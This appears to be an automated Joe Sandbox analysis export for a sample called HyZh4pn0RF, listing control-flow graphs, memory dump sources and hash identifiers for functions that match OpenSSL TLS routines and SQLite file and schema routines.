                                                                                                                                                                                                                                                                                                  control_flow_graph 693 7ffbab76ec70-7ffbab76ec9c call 7ffbab711325 696 7ffbab76ec9e-7ffbab76eca5 693->696 697 7ffbab76ecac-7ffbab76ecfc 693->697 696->697 698 7ffbab76ed00-7ffbab76ed05 697->698 699 7ffbab76ed0b-7ffbab76ed0e 698->699 700 7ffbab76ef14-7ffbab76ef17 698->700 703 7ffbab76ed10-7ffbab76ed13 699->703 704 7ffbab76ed4a-7ffbab76ed59 699->704 701 7ffbab76ef19-7ffbab76ef2b 700->701 702 7ffbab76ef34-7ffbab76ef3d 700->702 707 7ffbab76ef32 701->707 708 7ffbab76ef2d 701->708 721 7ffbab76f005-7ffbab76f009 702->721 722 7ffbab76ef43-7ffbab76ef46 702->722 705 7ffbab76ee6b-7ffbab76ee7a 703->705 706 7ffbab76ed19-7ffbab76ed1c 703->706 719 7ffbab76ed71-7ffbab76ed8e 704->719 720 7ffbab76ed5b-7ffbab76ed65 704->720 709 7ffbab76ee7c-7ffbab76ee80 705->709 710 7ffbab76ee8a-7ffbab76ee90 705->710 711 7ffbab76ed22-7ffbab76ed45 ERR_new ERR_set_debug 706->711 712 7ffbab76eee5-7ffbab76eee8 706->712 707->702 708->707 709->710 715 7ffbab76ee82-7ffbab76ee85 call 7ffbab711cf8 709->715 717 7ffbab76ee92-7ffbab76ee95 710->717 718 7ffbab76eeaa-7ffbab76eec1 710->718 716 7ffbab76f034-7ffbab76f03e call 7ffbab711d89 711->716 775 7ffbab76eeeb call 7ffbab770672 712->775 776 7ffbab76eeeb call 7ffbab7708b2 712->776 715->710 734 7ffbab76f043 716->734 717->718 728 7ffbab76ee97-7ffbab76eea8 717->728 729 7ffbab76eeca call 7ffbab711528 718->729 730 7ffbab76eec3-7ffbab76eec8 call 7ffbab711294 718->730 719->734 742 7ffbab76ed94-7ffbab76ed9c 719->742 720->719 723 7ffbab76f011-7ffbab76f016 ERR_new 721->723 724 7ffbab76f00b-7ffbab76f00f 721->724 731 7ffbab76ef58-7ffbab76ef66 722->731 732 7ffbab76ef48-7ffbab76ef4b 722->732 735 7ffbab76f01b-7ffbab76f02e ERR_set_debug 723->735 724->723 724->734 726 7ffbab76eeed-7ffbab76eef3 726->698 736 7ffbab76eef9-7ffbab76ef03 726->736 744 7ffbab76eecf-7ffbab76eed1 728->744 729->744 730->744 731->698 732->698 733 7ffbab76ef51-7ffbab76ef53 732->733 740 7ffbab76f045-7ffbab76f05d 733->740 734->740 735->716 736->700 746 7ffbab76edb1-7ffbab76edc4 call 7ffbab711389 742->746 747 7ffbab76ed9e-7ffbab76edac 742->747 744->734 745 7ffbab76eed7-7ffbab76eede 744->745 745->712 750 7ffbab76efec-7ffbab76effb call 7ffbab711b9a ERR_new 746->750 751 7ffbab76edca-7ffbab76edeb 746->751 747->698 750->721 751->750 755 7ffbab76edf1-7ffbab76edfc 751->755 756 7ffbab76ee32-7ffbab76ee53 755->756 757 7ffbab76edfe-7ffbab76ee0a 755->757 762 7ffbab76ee59-7ffbab76ee65 call 7ffbab711140 756->762 763 7ffbab76efd3-7ffbab76efe2 call 7ffbab711b9a ERR_new 756->763 760 7ffbab76ee10-7ffbab76ee13 757->760 761 7ffbab76ef8a-7ffbab76ef98 call 7ffbab711b9a 757->761 760->756 765 7ffbab76ee15-7ffbab76ee2d call 7ffbab711b9a 760->765 772 7ffbab76ef9a-7ffbab76ef9e 761->772 773 7ffbab76efa4-7ffbab76efae ERR_new 761->773 762->705 762->763 763->750 765->698 772->734 772->773 773->735 775->726 776->726
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem.c$write_state_machine
                                                                                                                                                                                                                                                                                                  • API String ID: 193678381-552286378
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1edee16b17f7b7a209ddbeed6cd636bdd8764bdbe6572802cc707b3b873bb90e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 40900a2db95c19493cec5cb73dbc017aebc0ec8a29cc56bfa9546427b3585568
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1edee16b17f7b7a209ddbeed6cd636bdd8764bdbe6572802cc707b3b873bb90e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EA1B4B2A0A54286EB639F35D4643B92360FF40B48F84803AED1D47AB5DFBDE945D710

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_lib.c$ssl_read_internal
                                                                                                                                                                                                                                                                                                  • API String ID: 1552677711-1892056158
                                                                                                                                                                                                                                                                                                  • Opcode ID: b7bb0f8f0bf7d0024ae74c1eb72a6c5e298df64c6c8bd7127caa5be1f139f7e8
                                                                                                                                                                                                                                                                                                  • Instruction ID: fad96c2592c162c266ed13894c602730354085ed947c3be8f809b8ff5f322a12
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7bb0f8f0bf7d0024ae74c1eb72a6c5e298df64c6c8bd7127caa5be1f139f7e8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09318DB2B0A68685E752DB34E8816A96350FB44B84F548035EE6D43BB6CF7CE841C601

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1276 7ffbaa602310-7ffbaa6023d4 call 7ffbaa602010 1279 7ffbaa6023da-7ffbaa6023f5 1276->1279 1280 7ffbaa60277c-7ffbaa60277f 1276->1280 1281 7ffbaa6023f7-7ffbaa60240a 1279->1281 1282 7ffbaa60240f-7ffbaa602413 1279->1282 1283 7ffbaa602789-7ffbaa60278c call 7ffbaa586db0 1280->1283 1284 7ffbaa602781-7ffbaa602787 1280->1284 1285 7ffbaa6027a5-7ffbaa6027c4 call 7ffbaa6aabc0 1281->1285 1286 7ffbaa602415-7ffbaa60241c 1282->1286 1287 7ffbaa602423-7ffbaa60242f 1282->1287 1288 7ffbaa602791-7ffbaa602797 call 7ffbaa5dfb70 1283->1288 1284->1283 1284->1288 1286->1287 1291 7ffbaa60241e call 7ffbaa59f2c0 1286->1291 1292 7ffbaa602431-7ffbaa602435 1287->1292 1293 7ffbaa60243b-7ffbaa60243f 1287->1293 1300 7ffbaa60279c-7ffbaa60279e 1288->1300 1291->1287 1292->1293 1297 7ffbaa6024bb-7ffbaa6024c6 1292->1297 1298 7ffbaa602447-7ffbaa60244c call 7ffbaa5a2ba0 1293->1298 1299 7ffbaa602441-7ffbaa602445 1293->1299 1303 7ffbaa6024d0-7ffbaa6024e7 call 7ffbaa5ac880 1297->1303 1304 7ffbaa602451-7ffbaa602455 1298->1304 1299->1298 1301 7ffbaa6024b8 1299->1301 1300->1285 1301->1297 1309 7ffbaa6024e9-7ffbaa6024f1 1303->1309 1304->1301 1307 7ffbaa602457-7ffbaa602464 call 7ffbaa63f6a0 1304->1307 1313 7ffbaa602466-7ffbaa60246d 1307->1313 1314 7ffbaa60249e-7ffbaa6024a5 1307->1314 1311 7ffbaa6024f3-7ffbaa6024fc 1309->1311 1312 7ffbaa6024fe 1309->1312 1315 7ffbaa602501-7ffbaa60250f 1311->1315 1312->1315 1316 7ffbaa602470-7ffbaa602479 1313->1316 1319 7ffbaa6024a7-7ffbaa6024aa call 7ffbaa586570 1314->1319 1320 7ffbaa6024af-7ffbaa6024b3 1314->1320 1317 7ffbaa602515-7ffbaa602517 1315->1317 1318 7ffbaa6025c2 1315->1318 1316->1316 1321 7ffbaa60247b-7ffbaa60248d call 7ffbaa5869f0 1316->1321 1322 7ffbaa602519-7ffbaa60251e 1317->1322 1323 7ffbaa602552-7ffbaa602558 1317->1323 1324 7ffbaa6025c7-7ffbaa6025da 1318->1324 1319->1320 1326 7ffbaa60275f-7ffbaa602767 1320->1326 1321->1314 1347 7ffbaa60248f-7ffbaa602499 memcpy 1321->1347 1322->1323 1330 7ffbaa602520-7ffbaa602535 1322->1330 1323->1318 1333 7ffbaa60255a-7ffbaa60256d call 7ffbaa5869f0 1323->1333 1331 7ffbaa602610-7ffbaa602623 1324->1331 1332 7ffbaa6025dc-7ffbaa6025e1 1324->1332 1327 7ffbaa602769-7ffbaa60276d 1326->1327 1328 7ffbaa602774-7ffbaa60277a 1326->1328 1327->1328 1337 7ffbaa60276f call 7ffbaa59f290 1327->1337 1328->1280 1328->1300 1339 7ffbaa602548-7ffbaa602550 call 7ffbaa5e8e20 1330->1339 1340 7ffbaa602537-7ffbaa60253a 1330->1340 1335 7ffbaa602629-7ffbaa602631 1331->1335 1336 7ffbaa602625 1331->1336 1341 7ffbaa6025f3-7ffbaa6025fa 1332->1341 1342 7ffbaa6025e3-7ffbaa6025e8 1332->1342 1353 7ffbaa6025a3-7ffbaa6025aa 1333->1353 1354 7ffbaa60256f-7ffbaa6025a0 1333->1354 1344 7ffbaa602679-7ffbaa60267b 1335->1344 1345 7ffbaa602633-7ffbaa602646 call 7ffbaa5869f0 1335->1345 1336->1335 1337->1328 1339->1324 1340->1339 1348 7ffbaa60253c-7ffbaa60253e 1340->1348 1352 7ffbaa6025fd-7ffbaa60260b call 7ffbaa5a2260 1341->1352 1349 7ffbaa6025ea-7ffbaa6025ef 1342->1349 1350 7ffbaa6025f1 1342->1350 1357 7ffbaa602688-7ffbaa6026d8 call 7ffbaa5892e0 call 7ffbaa5fb060 1344->1357 1358 7ffbaa60267d-7ffbaa602681 1344->1358 1370 7ffbaa602648-7ffbaa60265a 1345->1370 1371 7ffbaa60265f-7ffbaa602666 1345->1371 1347->1314 1348->1339 1356 7ffbaa602540-7ffbaa602543 1348->1356 1349->1352 1350->1341 1352->1331 1361 7ffbaa6025b4-7ffbaa6025bd 1353->1361 1362 7ffbaa6025ac-7ffbaa6025af call 7ffbaa586570 1353->1362 1354->1353 1364 7ffbaa602750-7ffbaa602754 1356->1364 1376 7ffbaa6026dd-7ffbaa6026ef 1357->1376 1358->1357 1365 7ffbaa602683 1358->1365 1361->1364 1362->1361 1364->1326 1368 7ffbaa602756-7ffbaa60275a call 7ffbaa5a3f60 1364->1368 1365->1357 1368->1326 1370->1371 1374 7ffbaa602668-7ffbaa60266b call 7ffbaa586570 1371->1374 1375 7ffbaa602670-7ffbaa602674 1371->1375 1374->1375 1375->1364 1378 7ffbaa6026f1-7ffbaa6026f7 call 7ffbaa586570 1376->1378 1379 7ffbaa6026fc-7ffbaa6026fe 1376->1379 1378->1379 1381 7ffbaa602700-7ffbaa602706 call 7ffbaa5dcc40 1379->1381 1382 7ffbaa60270b-7ffbaa60270f 1379->1382 1381->1382 1384 7ffbaa602728-7ffbaa60272a 1382->1384 1385 7ffbaa602711-7ffbaa602726 call 7ffbaa5dfc00 1382->1385 1387 7ffbaa60272c-7ffbaa602734 1384->1387 1388 7ffbaa60273b-7ffbaa60274b 1384->1388 1385->1364 1387->1364 1390 7ffbaa602736-7ffbaa602739 1387->1390 1388->1364 1390->1364 1390->1388
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-879093740
                                                                                                                                                                                                                                                                                                  • Opcode ID: e211291552fdeeff28b77209d71417d8ca2fa6ad64ce2d5f01da26aa779ab433
                                                                                                                                                                                                                                                                                                  • Instruction ID: 287213fff172f7934f37b672f1d881503c4604235ab23e042fa70aa3ec9e1b64
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e211291552fdeeff28b77209d71417d8ca2fa6ad64ce2d5f01da26aa779ab433
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87E1AFA2E0A752D6EB12CB38C8402BD77A9BF55B48F0592B1CF4C27795DF38E4928750

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1391 7ffbab780710-7ffbab780740 call 7ffbab711325 1394 7ffbab780744-7ffbab78074e 1391->1394 1395 7ffbab780750-7ffbab78077f call 7ffbab711c1c 1394->1395 1396 7ffbab7807b9-7ffbab7807bd 1394->1396 1401 7ffbab780783-7ffbab780785 1395->1401 1397 7ffbab780913-7ffbab78092f call 7ffbab7126c6 1396->1397 1398 7ffbab7807c3-7ffbab7807c7 1396->1398 1408 7ffbab780931-7ffbab780952 call 7ffbab711e42 1397->1408 1409 7ffbab780954-7ffbab780983 1397->1409 1398->1397 1399 7ffbab7807cd-7ffbab7807d0 1398->1399 1399->1397 1402 7ffbab7807d6-7ffbab7807da 1399->1402 1404 7ffbab78078b-7ffbab780792 1401->1404 1405 7ffbab780905 1401->1405 1402->1397 1406 7ffbab7807e0-7ffbab7807e4 1402->1406 1410 7ffbab78086d-7ffbab780874 1404->1410 1411 7ffbab780798-7ffbab78079b 1404->1411 1407 7ffbab78090c-7ffbab78090e 1405->1407 1406->1397 1412 7ffbab7807ea-7ffbab7807ee 1406->1412 1413 7ffbab78099a-7ffbab7809ac 1407->1413 1417 7ffbab780987-7ffbab78098e 1408->1417 1409->1417 1415 7ffbab7808ce-7ffbab780900 ERR_new ERR_set_debug call 7ffbab711d89 1410->1415 1416 7ffbab780876-7ffbab78087c 1410->1416 1418 7ffbab7807a1-7ffbab7807b7 1411->1418 1419 7ffbab780836-7ffbab780868 ERR_new ERR_set_debug call 7ffbab711d89 1411->1419 1412->1397 1422 7ffbab7807f4-7ffbab780805 1412->1422 1415->1413 1416->1415 1425 7ffbab78087e-7ffbab780881 1416->1425 1420 7ffbab780995 1417->1420 1418->1395 1418->1396 1419->1413 1420->1413 1422->1394 1428 7ffbab78080b-7ffbab780831 1422->1428 1425->1415 1426 7ffbab780883-7ffbab780887 1425->1426 1430 7ffbab780889-7ffbab780893 1426->1430 1431 7ffbab780895-7ffbab7808c9 1426->1431 1428->1394 1430->1407 1430->1431 1431->1420
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: R_newR_set_debug
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_lib.c$tls_get_message_header
                                                                                                                                                                                                                                                                                                  • API String ID: 193678381-2714770296
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a675c68133e8178ac648a78a03b7d1437f40432096ecb796daf1537fba5ad51
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0cb5f49f707b477c41db60a8519fefeb7a25b1c74896b07154ebe1ef0b67c6f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a675c68133e8178ac648a78a03b7d1437f40432096ecb796daf1537fba5ad51
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E615BB2A0968286EBA28F71E4503B937A0FB44B48F08C036DE9D467B5DF7CE494C750

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1434 7ffbaa58dc50-7ffbaa58dc7b 1435 7ffbaa58dccb-7ffbaa58dcef 1434->1435 1436 7ffbaa58dc7d-7ffbaa58dc92 1434->1436 1439 7ffbaa58dcf4-7ffbaa58dd18 ReadFile 1435->1439 1437 7ffbaa58dcb4-7ffbaa58dcc8 memcpy 1436->1437 1438 7ffbaa58dc94 memcpy 1436->1438 1437->1435 1440 7ffbaa58dc99 1438->1440 1441 7ffbaa58dd8a-7ffbaa58dd8c 1439->1441 1442 7ffbaa58dd1a-7ffbaa58dd23 1439->1442 1443 7ffbaa58dc9b-7ffbaa58dcb3 1440->1443 1444 7ffbaa58ddba-7ffbaa58ddc3 1441->1444 1445 7ffbaa58dd8e-7ffbaa58ddb5 call 7ffbaa5894b0 1441->1445 1442->1441 1449 7ffbaa58dd25-7ffbaa58dd33 1442->1449 1444->1440 1448 7ffbaa58ddc9-7ffbaa58ddde memset 1444->1448 1445->1444 1448->1443 1451 7ffbaa58dd64-7ffbaa58dd85 call 7ffbaa58da80 1449->1451 1452 7ffbaa58dd35-7ffbaa58dd3b 1449->1452 1451->1443 1454 7ffbaa58dd43-7ffbaa58dd46 1452->1454 1455 7ffbaa58dd3d-7ffbaa58dd41 1452->1455 1457 7ffbaa58dd50-7ffbaa58dd62 1454->1457 1458 7ffbaa58dd48-7ffbaa58dd4e 1454->1458 1455->1454 1455->1457 1457->1439 1458->1451 1458->1457
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$FileReadmemset
                                                                                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                                                                  • API String ID: 2051157613-1843600136
                                                                                                                                                                                                                                                                                                  • Opcode ID: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 79add03363f863de2e69e6ee55b3db8cf019b3fe47056e33b8344ca92f69bb6c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 505e69acdbc416d286ffe42e890aa3e194485d8a64ffd5326fe3626b5f21587f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA4127B3A0AA02C1E7119F39E8404A9B7E9FB49B80F401176EE4D43695DF3CE4439B54

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1838275993.00007FFBAB711000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFBAB710000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838232920.00007FFBAB710000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838275993.00007FFBAB792000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838486293.00007FFBAB7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C1000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7C7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab710000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                                                                                                  • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                                                                                                  • Opcode ID: c91630741219631a69d9c5f3432363629406958cc77146902cc34db31b5e4eda
                                                                                                                                                                                                                                                                                                  • Instruction ID: 17b14c479d34d7da8ea8a1f4818a866b29389ca14b33897f6dff477523316d16
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c91630741219631a69d9c5f3432363629406958cc77146902cc34db31b5e4eda
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC21C4A7F0974682E642EB35F4512BD3361EF88784F588131EE6D06BBADF7CE5808600
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$CreateFile
                                                                                                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                                                                  • API String ID: 333288564-3829269058
                                                                                                                                                                                                                                                                                                  • Opcode ID: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b5221049455af020749d2f9899060ee30475594400883d29ae09234636157f6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9802E5A1A0EA42C6FB968F79E88027D33E8FF95B94F041575DD4D066A0DF3CE4469B20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
